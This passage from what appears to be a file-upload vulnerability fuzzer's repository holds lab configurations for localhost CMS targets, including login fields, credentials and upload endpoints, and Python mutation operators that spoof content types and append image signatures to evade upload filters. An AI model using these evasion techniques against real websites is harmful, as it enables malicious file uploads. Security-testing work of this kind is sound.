http://127.0.0.1 7 | WebLoginIDName = admin_name 8 | WebLoginPWName = admin_pass 9 | WebLoginURL = http://127.0.0.1/zencart/coUnt-ddR-Buses/login.php?camefrom=index.php 10 | WebLoginPageURL = http://127.0.0.1/zencart/coUnt-ddR-Buses/login.php 11 | WebLoginCSRFName = securityToken;action 12 | WebLoginAdditionalValue = 13 | WebLoginSuccessStr = ">LogoffLog out 14 | WebUploadURL = http://127.0.0.1/symphony/symphony/publish/articles/new/ 15 | WebUploadPageURL = http://127.0.0.1/symphony/symphony/publish/articles/new/ 16 | WebUploadFormAttr = 17 | WebUploadCustomHeader = 18 | WebUploadCSRFName = xsrf 19 | WebUploadSuccessStr = >Delete 20 | WebUploadAdditionalValue = 
MAX_FILE_SIZE=5242880;fields[title]=%filename#;fields[body]=fusetest;fields[date]=03/15/2019 8:16 pm;fields[categories]=2;fields[fileupload]=%filebinary#;action[save]=Save Changes;action[timestamp]=2019-03-15T20:17:02+09:00 21 | WebUploadedFileUrlPattern = http://127.0.0.1/symphony/workspace/uploads/[a-z|0-9|\_|\-]*(.[a-z|0-9]*)? 22 | WebUploadFilesURL = 23 | WebUploadFilesParameter = 24 | 25 | [DETECTOR_CONF] 26 | 27 | MutationChainLimit = 99 28 | MonitorEnable = False 29 | MonitorHost = 30 | MonitorPort = 31 | -------------------------------------------------------------------------------- /configs/concrete5-credential-non-monitor_new.conf: -------------------------------------------------------------------------------- 1 | [USER_CREDENTIAL] 2 | 3 | ID = admin 4 | PW = vu!nweb321 5 | WebRootPath = /var/www/html/ 6 | WebHost = http://127.0.0.1 7 | WebLoginIDName = uName 8 | WebLoginPWName = uPassword 9 | WebLoginURL = http://127.0.0.1/concrete5/index.php/login/authenticate/concrete 10 | WebLoginPageURL = http://127.0.0.1/concrete5/index.php/login 11 | WebLoginCSRFName = ccm_token 12 | WebLoginAdditionalValue = 13 | WebLoginSuccessStr = >admin 14 | WebUploadURL = http://127.0.0.1/concrete5/index.php/ccm/system/file/upload 15 | WebUploadPageURL = http://127.0.0.1/concrete5/index.php/dashboard/files/search 16 | WebUploadFormAttr = 17 | WebUploadCustomHeader = 18 | WebUploadCSRFName = ccm_token 19 | WebUploadSuccessStr = [{"canCopyFile":1 20 | WebUploadAdditionalValue = currentFolder=0;file=%filebinary# 21 | WebUploadedFileUrlPattern = http://127.0.0.1/concrete5/application/files/[0-9]{4}/[0-9]{4}/[0-9]{4}/%genfile# 22 | WebUploadFilesURL = http://127.0.0.1/concrete5/index.php/ccm/system/file/folder/contents?&ccm_order_by=folderItemModified&ccm_order_by_direction=desc&ccm_cursor= 23 | WebUploadFilesParameter = 24 | 25 | [DETECTOR_CONF] 26 | 27 | MutationChainLimit = 99 28 | MonitorEnable = False 29 | MonitorHost = 127.0.0.1 30 | MonitorPort = 31 | 
-------------------------------------------------------------------------------- /configs/composr-credential.conf: -------------------------------------------------------------------------------- 1 | [USER_CREDENTIAL] 2 | 3 | ID = vuln_web 4 | PW = vu!nweb321 5 | WebRootPath = /var/www/html/ 6 | WebHost = http://127.0.0.1 7 | WebLoginIDName = login_username 8 | WebLoginPWName = password 9 | WebLoginURL = http://127.0.0.1/composr/index.php?page=login&type=login 10 | WebLoginPageURL = http://127.0.0.1/composr/index.php?page=start&redirected=1 11 | WebLoginCSRFName = csrf_token 12 | WebLoginAdditionalValue = redirect=http://127.0.0.1/composr/index.php?page=start 13 | WebLoginSuccessStr = vuln_web 14 | WebUploadURL = http://127.0.0.1/composr/data/incoming_uploads.php?keep_session=%cookie:reg:cms_session__[0-9|a-f]{32}# 15 | WebUploadPageURL = http://127.0.0.1/composr/cms/index.php?page=cms-downloads&type=add&cat=1&redirect=http%3A%2F%2F127.0.0.1%2Fcomposr%2Fsite%2Findex.php%3Fpage%3Ddownloads%26redirected%3D1 16 | WebUploadFormAttr = 17 | WebUploadCustomHeader = 18 | WebUploadCSRFName = 19 | #WebUploadSuccessStr = "upload_savename": 20 | WebUploadSuccessStr = " 21 | WebUploadAdditionalValue = name=%filename#;file=%filebinary# 22 | WebUploadedFileUrlPattern = 23 | WebUploadFilesURL = 24 | WebUploadFilesParameter = 25 | 26 | [DETECTOR_CONF] 27 | 28 | MutationChainLimit = 99 29 | MonitorEnable = True 30 | MonitorHost = 127.0.0.1 31 | MonitorPort = 32 | -------------------------------------------------------------------------------- /configs/concrete5-credential-non-monitor.conf: -------------------------------------------------------------------------------- 1 | [USER_CREDENTIAL] 2 | 3 | ID = admin 4 | PW = vu!nweb321 5 | WebRootPath = /var/www/html/ 6 | WebHost = http://127.0.0.1 7 | WebLoginIDName = uName 8 | WebLoginPWName = uPassword 9 | WebLoginURL = http://127.0.0.1/concrete5/index.php/login/authenticate/concrete 10 | WebLoginPageURL = 
http://127.0.0.1/concrete5/index.php/login 11 | WebLoginCSRFName = ccm_token 12 | WebLoginAdditionalValue = 13 | WebLoginSuccessStr = >admin 14 | WebUploadURL = http://127.0.0.1/concrete5/index.php/ccm/system/file/upload 15 | WebUploadPageURL = http://127.0.0.1/concrete5/index.php/tools/required/files/import?currentFolder=0 16 | WebUploadFormAttr = 17 | WebUploadCustomHeader = 18 | WebUploadCSRFName = ccm_token 19 | WebUploadSuccessStr = [{"canCopyFile":1 20 | WebUploadAdditionalValue = currentFolder=0;file=%filebinary# 21 | WebUploadedFileUrlPattern = http://127.0.0.1/concrete5/application/files/[0-9]{4}/[0-9]{4}/[0-9]{4}/%genfile# 22 | WebUploadFilesURL = http://127.0.0.1/concrete5/index.php/ccm/system/file/folder/contents?&ccm_order_by=folderItemModified&ccm_order_by_direction=desc&ccm_cursor= 23 | WebUploadFilesParameter = 24 | 25 | [DETECTOR_CONF] 26 | 27 | MutationChainLimit = 99 28 | MonitorEnable = False 29 | MonitorHost = 127.0.0.1 30 | MonitorPort = 31 | -------------------------------------------------------------------------------- /configs/getsimplecms-credential-non-monitor.conf: -------------------------------------------------------------------------------- 1 | [USER_CREDENTIAL] 2 | 3 | ID = vuln_web 4 | PW = vu!nweb321 5 | WebRootPath = /var/www/html/ 6 | WebHost = http://127.0.0.1 7 | WebLoginIDName = userid 8 | WebLoginPWName = pwd 9 | WebLoginURL = http://127.0.0.1/getsimplecms/admin/index.php 10 | WebLoginPageURL = http://127.0.0.1/getsimplecms/admin/ 11 | WebLoginCSRFName = 12 | WebLoginAdditionalValue = submitted=Login 13 | WebLoginSuccessStr = >Logout 14 | WebUploadURL = http://127.0.0.1/getsimplecms/admin/upload.php?path= 15 | WebUploadPageURL = http://127.0.0.1/getsimplecms/admin/upload.php 16 | WebUploadFormAttr = 17 | WebUploadCustomHeader = 18 | WebUploadCSRFName = 19 | WebUploadSuccessStr = %notin=problem# 20 | WebUploadAdditionalValue = file[]=%filebinary#;hash=%domtoken:value="[a-f|0-9]{40}"@[a-f|0-9]{40}#;submit=Upload 21 | # 
WebUploadAdditionalValue = Filename=%filename#;sessionHash=%domtoken: '[a-f|0-9]{40}',@[a-f|0-9]{40}#;Filedata=%filebinary#;Upload=Submit Query 22 | WebUploadedFileUrlPattern = ../data/uploads/[0-9|a-f]{32}(_[a-z|0-9|\_]*)*(\.[a-z|0-9]*)+ 23 | WebUploadFilesURL = http://127.0.0.1/getsimplecms/admin/upload.php? 24 | WebUploadFilesParameter = 25 | 26 | [DETECTOR_CONF] 27 | 28 | MutationChainLimit = 99 29 | MonitorEnable = False 30 | MonitorHost = 127.0.0.1 31 | MonitorPort = 32 | -------------------------------------------------------------------------------- /configs/collabtive-credential-mk2-non-monitor.conf: -------------------------------------------------------------------------------- 1 | [USER_CREDENTIAL] 2 | 3 | ID = vuln_web 4 | PW = vu!nweb321 5 | WebRootPath = /var/www/html/ 6 | WebHost = http://127.0.0.1 7 | WebLoginIDName = username 8 | WebLoginPWName = pass 9 | WebLoginURL = http://127.0.0.1/collabtive/manageuser.php?action=login 10 | WebLoginPageURL = http://127.0.0.1/collabtive/index.php 11 | WebLoginCSRFName = 12 | WebLoginAdditionalValue = 13 | WebLoginSuccessStr = My Account 14 | WebUploadURL = http://127.0.0.1/collabtive/manageuser.php?action=edit 15 | WebUploadPageURL = http://127.0.0.1/collabtive/manageuser.php?action=editform&id=1 16 | WebUploadFormAttr = 17 | WebUploadCustomHeader = 18 | WebUploadCSRFName = 19 | WebUploadSuccessStr = %filename# 20 | WebUploadAdditionalValue = address1=;address2=;admin=;company=;name=vuln_web;userfile=%filebinary#;file-avatar=;email=asdf@df.as;web=;tel1=;tel2=;zip=;country=;state=;gender=;locale=;oldpass=;newpass=;repeatpass= 21 | WebUploadedFileUrlPattern = files/standard/avatar/([0-9|a-f]{32})(_M[0-9]{1,2}[A-Z|0-9]*)+_[0-9]{5,6}.txt 22 | WebUploadFilesURL = http://127.0.0.1/collabtive/manageuser.php?action=profile&id=1&mode=edited 23 | WebUploadFilesParameter = 24 | 25 | [DETECTOR_CONF] 26 | 27 | MutationChainLimit = 99 28 | MonitorEnable = False 29 | MonitorHost = 127.0.0.1 30 | MonitorPort = 31 | 
-------------------------------------------------------------------------------- /configs/mybb-credential.conf: -------------------------------------------------------------------------------- 1 | [USER_CREDENTIAL] 2 | 3 | ID = vuln_web 4 | PW = vu!nweb321 5 | WebRootPath = /var/www/html/mybb/ 6 | WebHost = http://127.0.0.1/mybb/ 7 | WebLoginIDName = quick_username 8 | WebLoginPWName = quick_password 9 | WebLoginURL = http://127.0.0.1/mybb/member.php 10 | WebLoginPageURL = http://127.0.0.1/mybb/member.php 11 | WebLoginCSRFName = my_post_key 12 | WebLoginAdditionalValue = action=do_login;url=http://127.0.0.1/mybb/index.php;quick_login=1;quick_remember=yes;submit=Login 13 | WebLoginSuccessStr = >You have successfully been logged in.< 14 | WebUploadURL = http://127.0.0.1/mybb/newthread.php?fid=2&processed=1 15 | WebUploadPageURL = http://127.0.0.1/mybb/newthread.php?fid=2 16 | WebUploadFormAttr = 17 | WebUploadCustomHeader = 18 | WebUploadCSRFName = my_post_key;posthash 19 | #WebUploadSuccessStr = %filename# 20 | WebUploadSuccessStr = 21 | WebUploadAdditionalValue = subject=;icon=-1;message=;postoptions[subscriptionmethod]=;newattachment=Add Attachment;action=do_newthread;attachmentaid=;attachmentact=;quoted_ids=;tid=0;numpolloptions=2;attachments[]=%filebinary# 22 | WebUploadedFileUrlPattern = 23 | WebUploadFilesURL = 24 | WebUploadFilesParameter = 25 | 26 | [DETECTOR_CONF] 27 | 28 | MutationChainLimit = 99 29 | MonitorEnable = True 30 | MonitorHost = 127.0.0.1 31 | MonitorPort = 32 | -------------------------------------------------------------------------------- /configs/eccube-credential-non-monitor.conf: -------------------------------------------------------------------------------- 1 | [USER_CREDENTIAL] 2 | 3 | ID = vuln_web 4 | PW = vu!nweb321 5 | WebRootPath = /var/www/html/ 6 | WebHost = http://127.0.0.1 7 | WebLoginIDName = login_id 8 | WebLoginPWName = password 9 | WebLoginURL = http://127.0.0.1/eccube/html/vuln_web/login_check 10 | WebLoginPageURL = 
http://127.0.0.1/eccube/html/vuln_web/ 11 | WebLoginCSRFName = _csrf_token 12 | WebLoginAdditionalValue = 13 | WebLoginSuccessStr = eccube/html/vuln_web/logout"> 14 | WebUploadURL = http://127.0.0.1/eccube/html/vuln_web/content/file_manager? 15 | WebUploadPageURL = http://127.0.0.1/eccube/html/vuln_web/content/file_manager 16 | WebUploadFormAttr = 17 | WebUploadCustomHeader = 18 | WebUploadCSRFName = form[_token] 19 | WebUploadSuccessStr = %filename# 20 | WebUploadAdditionalValue = mode=upload;now_file=/var/www/html/eccube/html/user_data/test;now_dir=/var/www/html/eccube/html/user_data/test;tree_select_file=/var/www/html/eccube/html/user_data/test;tree_status=/var/www/html/eccube/html/user_data/test;select_file=;form[file]=%filebinary#;form[create_file]= 21 | WebUploadedFileUrlPattern = http://127.0.0.1/eccube/html/user_data/test/%filename# 22 | WebUploadFilesURL = 23 | WebUploadFilesParameter = 24 | 25 | [DETECTOR_CONF] 26 | 27 | MutationChainLimit = 99 28 | MonitorEnable = False 29 | MonitorHost = 127.0.0.1 30 | MonitorPort = 31 | -------------------------------------------------------------------------------- /configs/wordpress-credential.conf: -------------------------------------------------------------------------------- 1 | [USER_CREDENTIAL] 2 | 3 | ID = vuln_web 4 | PW = vu!nweb321 5 | WebRootPath = /var/www/html/ 6 | WebHost = http://127.0.0.1 7 | WebLoginIDName = log 8 | WebLoginPWName = pwd 9 | WebLoginURL = http://127.0.0.1/wordpress/wp-login.php 10 | WebLoginPageURL = http://127.0.0.1/wordpress/wp-login.php 11 | WebLoginCSRFName = None 12 | WebLoginAdditionalValue = testcookie=1;redirect_to=http://127.0.0.1/wordpress/wp-admin/;wp-submit=Log In 13 | WebLoginSuccessStr = Edit My Profile 14 | WebUploadURL = http://127.0.0.1/wordpress/wp-admin/async-upload.php 15 | WebUploadPageURL = http://127.0.0.1/wordpress/wp-admin/media-new.php 16 | WebUploadFormAttr = 17 | WebUploadCustomHeader = 18 | WebUploadCSRFName = _wpnonce 19 | WebUploadSuccessStr = 
%notin=error-div error# 20 | WebUploadAdditionalValue = name=%filename#;post_id=0;type=;tab=;short=1;async-upload=%filebinary# 21 | WebUploadedFileUrlPattern = http://127.0.0.1/wordpress/wp-content/uploads/[0-9]{4}/[0-9]{2}/%genfile# 22 | WebUploadFilesURL = http://127.0.0.1/wordpress/wp-admin/admin-ajax.php 23 | WebUploadFilesParameter = action=query-attachments;post_id=0;query[orderby]=date&query[order]=DESC;query[posts_per_page]=40;query[paged]=1 24 | 25 | [DETECTOR_CONF] 26 | 27 | MutationChainLimit = 99 28 | MonitorEnable = False 29 | MonitorHost = 127.0.0.1 30 | MonitorPort = 31 | -------------------------------------------------------------------------------- /mutation_op/m13.py: -------------------------------------------------------------------------------- 1 | from mutation_op import * 2 | import utils 3 | 4 | class mOP(MutationOP): 5 | __comment__ = "Mutation13: Appending Signature" 6 | __mutate_type__ = "file" # (file|request) ; type of target 7 | __exclusion_op__ = {'php':['M13'], 'html':['M04_BZ2','M13'], 'xhtml':['M13','M8'], 'js':['M13']}#['M10', 'M07_PHP', 'M07_OTHER', 'M04_JPG', 'M04_PNG', 'M04_GIF', 'M04_ZIP', 'M04_TAR_GZ', 'M04_PDF', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHAR', 'M04_PHT', 'M04_PHTML'] # ([classname])when this op used for mutation, 8 | # operations in this list can be used to extra mutation. 
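    __resource__ = {} # ({type:resource filename})
    __seed_dependency__ = __exclusion_op__.keys()#["html"] # seed file dependency for operation

    def operation(self, output, seed_file, resource_file=None):
        """Append the first 8 bytes of ./resource/test.jpg to the payload (M13).

        Args:
            output: dict mutated in place. Reads 'filename' and 'content';
                writes 'filename' (base name plus '_M13') and 'content'.
            seed_file: passed to utils.extract_filename() to get a base name
                when output['filename'] is None or empty.
            resource_file: accepted but not read here; the appended bytes
                always come from './resource/test.jpg'.

        Raises:
            IOError (OSError on Python 3): './resource/test.jpg' cannot be
                opened. Nothing in ``output`` has been modified at that point.
        """
        if output['filename'] != None and len(output['filename']) > 0:
            filename = output['filename']
        else:
            filename = utils.extract_filename(seed_file)

        # The path is resolved against the process working directory, not this
        # module, so the tool must be started from the directory that holds
        # resource/.
        with open('./resource/test.jpg','rb') as fp:
            data = fp.read(8)

        output['filename'] = filename + '_M13'
        # assumes output['content'] is a byte string (m02_jsgif.py concatenates
        # it with bytes literals) - TODO confirm.
        # A one-element slice compared with a bytes literal is used instead of
        # content[-1] == '\x0a': indexing bytes on Python 3 yields an int, which
        # never equals a str, and indexing an empty payload raises IndexError.
        if output['content'][-1:] == b'\x0a':
            # Replace the trailing newline with the signature bytes.
            output['content'] = output['content'][:-1]+data
        else:
            output['content'] += data

--------------------------------------------------------------------------------
/mutation_op/m09.py:
--------------------------------------------------------------------------------
from mutation_op import *
import utils

class mOP(MutationOP):
    __comment__ = "Mutation09 : Prepending HTML Dummy Comment"
    __mutate_type__ = "request" # (file|request) ; type of target
    __exclusion_op__ = {'php':['M09'], 'html':['M01_GIF', 'M01_JPG', 'M01_PDF', 'M01_PNG', 'M01_TAR_GZ', 'M01_ZIP', 'M02_GIF', 'M02_JPG', 'M02_JSBMP', 'M02_JSGIF', 'M02_PDF', 'M02_PNG', 'M02_ZIP', 'M06', 'M09','M04_BZ2','M04_XHT'], 'xhtml':['M06', 'M09','M04_BZ2']}#['M10', 'M07_PHP', 'M07_OTHER', 'M04_JPG', 'M04_PNG', 'M04_GIF', 'M04_ZIP', 'M04_TAR_GZ', 'M04_PDF', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHAR', 'M04_PHT', 'M04_PHTML'] # ([classname])when this op used for mutation,
    # operations in this list can be used to extra mutation.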
    __resource__ = {} # ({type:resource filename})
    __seed_dependency__ = __exclusion_op__.keys()#["html"] # seed file dependency for operation

    def operation(self, output, seed_file, resource_file=None):
        """Prepend the dummy string to output['content'] and tag the name (M09).

        ``output`` is mutated in place: 'content' is written first, then
        'filename' becomes the base name plus '_M9'. The base name is
        output['filename'] when it is set and non-empty, otherwise
        utils.extract_filename(seed_file). ``resource_file`` is not used.
        """
        current = output['filename']
        if current is None or len(current) == 0:
            base = utils.extract_filename(seed_file)
        else:
            base = current

        # NOTE(review): the literal is empty as shown on this page, which makes
        # the prepend a no-op; the class __comment__ speaks of an HTML dummy
        # comment, so the text may have been lost when the page was rendered.
        # Confirm against the repository.
        dummy = ""
        output['content'] = dummy + output['content']
        # The suffix is '_M9' while the exclusion lists spell this op 'M09'.
        output['filename'] = base + '_M9'

-------------------------------------------------------------------------------- /configs/silverstripe-credential-non-monitor.conf: -------------------------------------------------------------------------------- 1 | [USER_CREDENTIAL] 2 | 3 | ID = root@localhost.no 4 | PW = vu!nweb321 5 | WebRootPath = /var/www/html 6 | WebHost = http://127.0.0.1 7 | WebLoginIDName = Email 8 | WebLoginPWName = Password 9 | WebLoginURL = http://127.0.0.1/silverstripe/Security/login/default/LoginForm/ 10 | WebLoginPageURL = http://127.0.0.1/silverstripe/Security/login?BackURL=%2Fsilverstripe%2Fadmin%2Fpages%2F 11 | WebLoginCSRFName = SecurityID 12 | WebLoginAdditionalValue = AuthenticationMethod=SilverStripe\Security\MemberAuthenticator\MemberAuthenticator;BackURL=/silverstripe/admin/pages/;action_doLogin=Log in 13 | WebLoginSuccessStr = Default Admin 14 | WebUploadURL = http://127.0.0.1/silverstripe/admin/assets/api/createFile 15 | WebUploadPageURL = http://127.0.0.1/silverstripe/admin/assets/ 16 | WebUploadFormAttr = 17 | WebUploadCustomHeader = 18 | WebUploadCSRFName = 19 | WebUploadSuccessStr = %notin="status":"error"# 20 | WebUploadAdditionalValue = SecurityID=%domtoken:,\"SecurityID\":\"[a-f|0-9]{40}\",\"en@[a-f|0-9]{40}#;ParentID=1;Upload=%filebinary# 21 | WebUploadedFileUrlPattern = http://127.0.0.1/silverstripe/assets/[a-f|0-9]{10}/%genfile# 22 | WebUploadFilesURL = 23 | WebUploadFilesParameter = 24 | 25 | [DETECTOR_CONF] 26 | 27 | MutationChainLimit = 99 28 | MonitorEnable = False 29 | 
MonitorHost = 127.0.0.1 30 | MonitorPort = 31 | -------------------------------------------------------------------------------- /configs/xe-credential.conf: -------------------------------------------------------------------------------- 1 | [USER_CREDENTIAL] 2 | 3 | ID = root@localhost.no 4 | PW = vu!nweb321 5 | WebRootPath = /var/www/html/ 6 | WebHost = http://127.0.0.1 7 | WebLoginIDName = user_id 8 | WebLoginPWName = password 9 | WebLoginURL = http://127.0.0.1/xe/index.php?act=procMemberLogin 10 | WebLoginPageURL = http://127.0.0.1/xe/index.php?act=dispMemberLoginForm 11 | WebLoginCSRFName = 12 | WebLoginAdditionalValue = error_return_url=/xe/index.php?act=dispMemberLoginForm;mid=index;vid=;ruleset=@login;success_return_url=http://127.0.0.1/xe/index.php?module=admin;act=procMemberLogin;xe_validator_id=modules/member/skins 13 | WebLoginSuccessStr = Sign Out 14 | WebUploadURL = http://127.0.0.1/xe/index.php?module=file&act=procFileUpload&mid=board 15 | WebUploadPageURL = http://127.0.0.1/xe/board/96 16 | WebUploadFormAttr = 17 | WebUploadCustomHeader = 18 | WebUploadCSRFName = 19 | WebUploadSuccessStr = %filename# 20 | WebUploadAdditionalValue = editor_sequence=%domtoken:data-editor-sequence="[0-9]{1,7}"@[0-9]{1,7}#;mid=board;act=procFileUpload;Filedata=%filebinary# 21 | WebUploadedFileUrlPattern = ./files/attach/(images|binaries)/[0-9]{1,5}/[0-9]{1,5}/([0-9]{1,5}/)?[a-z|0-9]{32}(\.[a-z|A-Z|0-9]*)* 22 | WebUploadFilesURL = 23 | WebUploadFilesParameter = 24 | 25 | [DETECTOR_CONF] 26 | 27 | MutationChainLimit = 99 28 | MonitorEnable = False 29 | MonitorHost = 127.0.0.1 30 | MonitorPort = 31 | -------------------------------------------------------------------------------- /configs/oscommerce2-credential-non-monitor.conf: -------------------------------------------------------------------------------- 1 | [USER_CREDENTIAL] 2 | 3 | ID = vuln_web 4 | PW = vu!nweb321 5 | WebRootPath = /var/www/html/ 6 | WebHost = http://127.0.0.1 7 | WebLoginIDName = username 8 | 
WebLoginPWName = password 9 | WebLoginURL = http://127.0.0.1/oscommerce2/catalog/admin/login.php?action=process 10 | WebLoginPageURL = http://127.0.0.1/oscommerce2/catalog/admin/ 11 | WebLoginCSRFName = 12 | WebLoginAdditionalValue = 13 | WebLoginSuccessStr = Logoff 14 | WebUploadURL = http://127.0.0.1/oscommerce2/catalog/admin/categories.php?cPath=&action=insert_product 15 | WebUploadPageURL = http://127.0.0.1/oscommerce2/catalog/admin/categories.php?cPath=&action=new_product 16 | WebUploadFormAttr = 17 | WebUploadCustomHeader = 18 | WebUploadCSRFName = 19 | WebUploadSuccessStr = %filename# 20 | WebUploadAdditionalValue = products_status=1;products_date_available=;manufactures_id=;products_name[1]=;products_tax_class_id=0;products_price=;products_price_gross=0;products_description[1]=;products_quantity=;products_model=;products_image=%filebinary#;products_url[1]=;products_weight=;products_date_added=2018-10-22 21 | WebUploadedFileUrlPattern = http://127.0.0.1/oscommerce2/catalog/images/%filename# 22 | WebUploadFilesURL = 23 | WebUploadFilesParameter = 24 | 25 | [DETECTOR_CONF] 26 | 27 | MutationChainLimit = 99 28 | MonitorEnable = False 29 | MonitorHost = 127.0.0.1 30 | MonitorPort = 31 | -------------------------------------------------------------------------------- /configs/hotcrp-credential.conf: -------------------------------------------------------------------------------- 1 | [USER_CREDENTIAL] 2 | 3 | ID = taekneypot@gmail.com 4 | PW = vu!nweb321 5 | WebRootPath = /home/user/hotcrp/ 6 | WebHost = http://127.0.0.1:8080 7 | WebLoginIDName = email 8 | WebLoginPWName = password 9 | WebLoginURL = http://127.0.0.1:8080/testconf/?post=v57n95favigm 10 | WebLoginPageURL = http://127.0.0.1:8080/testconf/ 11 | WebLoginCSRFName = 12 | WebLoginAdditionalValue = signin=1 13 | WebLoginSuccessStr = ">Sign out< 14 | WebUploadURL = http://127.0.0.1:8080/testconf/paper.php/new/edit?post=%domtoken:post=[a-z|0-9]{12}@[a-z|0-9]{12}# 15 | #WebuploadURL = 
http://127.0.0.1:8080/testconf/paper.php/new 16 | WebUploadPageURL = http://127.0.0.1:8080/testconf/paper.php/new 17 | WebUploadFormAttr = 18 | #id=paperform 19 | WebUploadCustomHeader = 20 | WebUploadCSRFName = 21 | WebUploadSuccessStr = %filename# 22 | WebUploadAdditionalValue = title=%rndint#;paperUpload=%filebinary#;auname1=asdf;auemail1=222@dfs.dfs;auaff1=123421;auname2=;auemail2=;auaff2=;auname3=;auemail3=;auaff3=;auname4=;auemail4=;auaff4=;auname5=;auemail5=;auaff5=;has_contacts=1;abstract=asdf;has_pcconf=1;submitpaper=1;doemail=1;emailNote=;update=1;override=1;pcc1=1 23 | WebUploadedFileUrlPattern = \.\.\/\.\.\/doc\.php\/hotcrp2-paper[0-9]*(\.[a-z|0-9]*)+ 24 | WebUploadFilesURL = 25 | WebUploadFilesParameter = 26 | 27 | [DETECTOR_CONF] 28 | 29 | MutationChainLimit = 99 30 | MonitorEnable = False 31 | MonitorHost = 127.0.0.1 32 | MonitorPort = 33 | -------------------------------------------------------------------------------- /mutation_op/m03_jpg.py: -------------------------------------------------------------------------------- 1 | from mutation_op import * 2 | import utils 3 | 4 | class mOP(MutationOP): 5 | __comment__ = "Mutation3 : Change Contents-Type to JPG File" 6 | __mutate_type__ = "file" # (file|request) ; type of target 7 | __exclusion_op__ = {'php':['M03_GIF', 'M03_JPG', 'M03_PDF', 'M03_PNG', 'M03_TAR_GZ', 'M03_ZIP'], 'html':['M03_GIF', 'M03_JPG', 'M03_PDF', 'M03_PNG', 'M03_TAR_GZ', 'M03_ZIP','M04_BZ2','M04_XHT'], 'xhtml':['M03_GIF', 'M03_JPG', 'M03_PDF', 'M03_PNG', 'M03_TAR_GZ', 'M03_ZIP','M04_BZ2'], 'js':['M03_GIF', 'M03_JPG', 'M03_PDF', 'M03_PNG', 'M03_TAR_GZ', 'M03_ZIP','M04_JPG','M04_PNG','M04_GIF']}# ['M03_PNG', 'M03_GIF', 'M03_ZIP', 'M03_TAR_GZ', 'M03_PDF'] # ([classname])when this op used for mutation, 8 | # operations in this list can be used to extra mutation. 
    __resource__ = {"jpg":"resource/test.jpg"} # ({type:resource filename})
    __seed_dependency__ = __exclusion_op__.keys()#["php","html","js"] # seed file dependency for operation

    def operation(self, output, seed_file, resource_file=None):
        """Set output['filetype'] from the JPG resource and tag the name (M3JPG).

        ``output`` is mutated in place: 'filename' becomes the base name plus
        '_M3JPG', then 'filetype' is set to
        utils.extract_filetype(resource_file). When ``resource_file`` is None
        it falls back to self.__resource__["jpg"] ('resource/test.jpg').
        'content' and 'fileext' are left untouched.

        If, as the class __comment__ suggests, 'filetype' ends up as the
        declared content type of the upload, this case checks whether the
        receiving application relies on that client-supplied value alone.
        """
        if resource_file is None:
            resource_file = self.__resource__["jpg"]

        base_name = output['filename'] if output['filename'] else utils.extract_filename(seed_file)
        output['filename'] = base_name + '_M3JPG'
        output['filetype'] = utils.extract_filetype(resource_file)

--------------------------------------------------------------------------------
/mutation_op/m03_pdf.py:
--------------------------------------------------------------------------------
from mutation_op import *
import utils

class mOP(MutationOP):
    # NOTE(review): the text says "JPG" although this file is m03_pdf.py, its
    # resource is resource/test.pdf and its operation tags names '_M3PDF'; it
    # looks copied from m03_jpg.py. Left unchanged because it is a runtime
    # string - confirm nothing matches on it before correcting.
    __comment__ = "Mutation3 : Change Contents-Type to JPG File"
    __mutate_type__ = "file" # (file|request) ; type of target
    __exclusion_op__ = {'php':['M03_GIF', 'M03_JPG', 'M03_PDF', 'M03_PNG', 'M03_TAR_GZ', 'M03_ZIP'], 'html':['M03_GIF', 'M03_JPG', 'M03_PDF', 'M03_PNG', 'M03_TAR_GZ', 'M03_ZIP', 'M04_BZ2','M04_XHT'], 'xhtml':['M03_GIF', 'M03_JPG', 'M03_PDF', 'M03_PNG', 'M03_TAR_GZ', 'M03_ZIP','M04_BZ2'], 'js':['M03_GIF', 'M03_JPG', 'M03_PDF', 'M03_PNG', 'M03_TAR_GZ', 'M03_ZIP','M04_GIF','M04_JPG','M04_PNG']}#['M03_JPG', 'M03_PNG', 'M03_GIF', 'M03_ZIP', 'M03_TAR_GZ'] # ([classname])when this op used for mutation,
    # operations in this list can be used to extra mutation.
    __resource__ = {"pdf":"resource/test.pdf"} # ({type:resource filename})
    __seed_dependency__ = __exclusion_op__.keys()#["php","html","js"] # seed file dependency for operation

    def operation(self, output, seed_file, resource_file=None):
        """Set output['filetype'] from the PDF resource and tag the name (M3PDF).

        ``output`` is mutated in place: 'filename' becomes the base name plus
        '_M3PDF' and 'filetype' is set to
        utils.extract_filetype(resource_file), where ``resource_file``
        defaults to self.__resource__["pdf"] ('resource/test.pdf').
        """
        source = self.__resource__["pdf"] if resource_file is None else resource_file

        existing = output['filename']
        if existing is None or len(existing) == 0:
            stem = utils.extract_filename(seed_file)
        else:
            stem = existing

        # Name first, type second: if extract_filetype() raises, the name has
        # already been updated.
        output['filename'] = stem + '_M3PDF'
        output['filetype'] = utils.extract_filetype(source)

--------------------------------------------------------------------------------
/mutation_op/m03_zip.py:
--------------------------------------------------------------------------------
from mutation_op import *
import utils

class mOP(MutationOP):
    # NOTE(review): the text says "JPG" although this file is m03_zip.py, its
    # resource is resource/test.zip and its operation tags names '_M3ZIP'; it
    # looks copied from m03_jpg.py. Left unchanged because it is a runtime
    # string - confirm nothing matches on it before correcting.
    __comment__ = "Mutation3 : Change Contents-Type to JPG File"
    __mutate_type__ = "file" # (file|request) ; type of target
    __exclusion_op__ = {'php':['M03_GIF', 'M03_JPG', 'M03_PDF', 'M03_PNG', 'M03_TAR_GZ', 'M03_ZIP'], 'html':['M03_GIF', 'M03_JPG', 'M03_PDF', 'M03_PNG', 'M03_TAR_GZ', 'M03_ZIP', 'M04_BZ2', 'M04_XHT'], 'xhtml':['M03_GIF', 'M03_JPG', 'M03_PDF', 'M03_PNG', 'M03_TAR_GZ', 'M03_ZIP', 'M04_BZ2'], 'js':['M03_GIF', 'M03_JPG', 'M03_PDF', 'M03_PNG', 'M03_TAR_GZ', 'M03_ZIP', 'M04_JPG', 'M04_PNG', 'M04_GIF']}#['M03_JPG', 'M03_PNG', 'M03_GIF', 'M03_TAR_GZ', 'M03_PDF'] # ([classname])when this op used for mutation,
    # operations in this list can be used to extra mutation.
    __resource__ = {"zip":"resource/test.zip"} # ({type:resource filename})
    __seed_dependency__ = __exclusion_op__.keys()#["php","html","js"] # seed file dependency for operation

    def operation(self, output, seed_file, resource_file=None):
        """Set output['filetype'] from the ZIP resource and tag the name (M3ZIP).

        Mutates ``output`` in place. 'filename' gets the suffix '_M3ZIP'
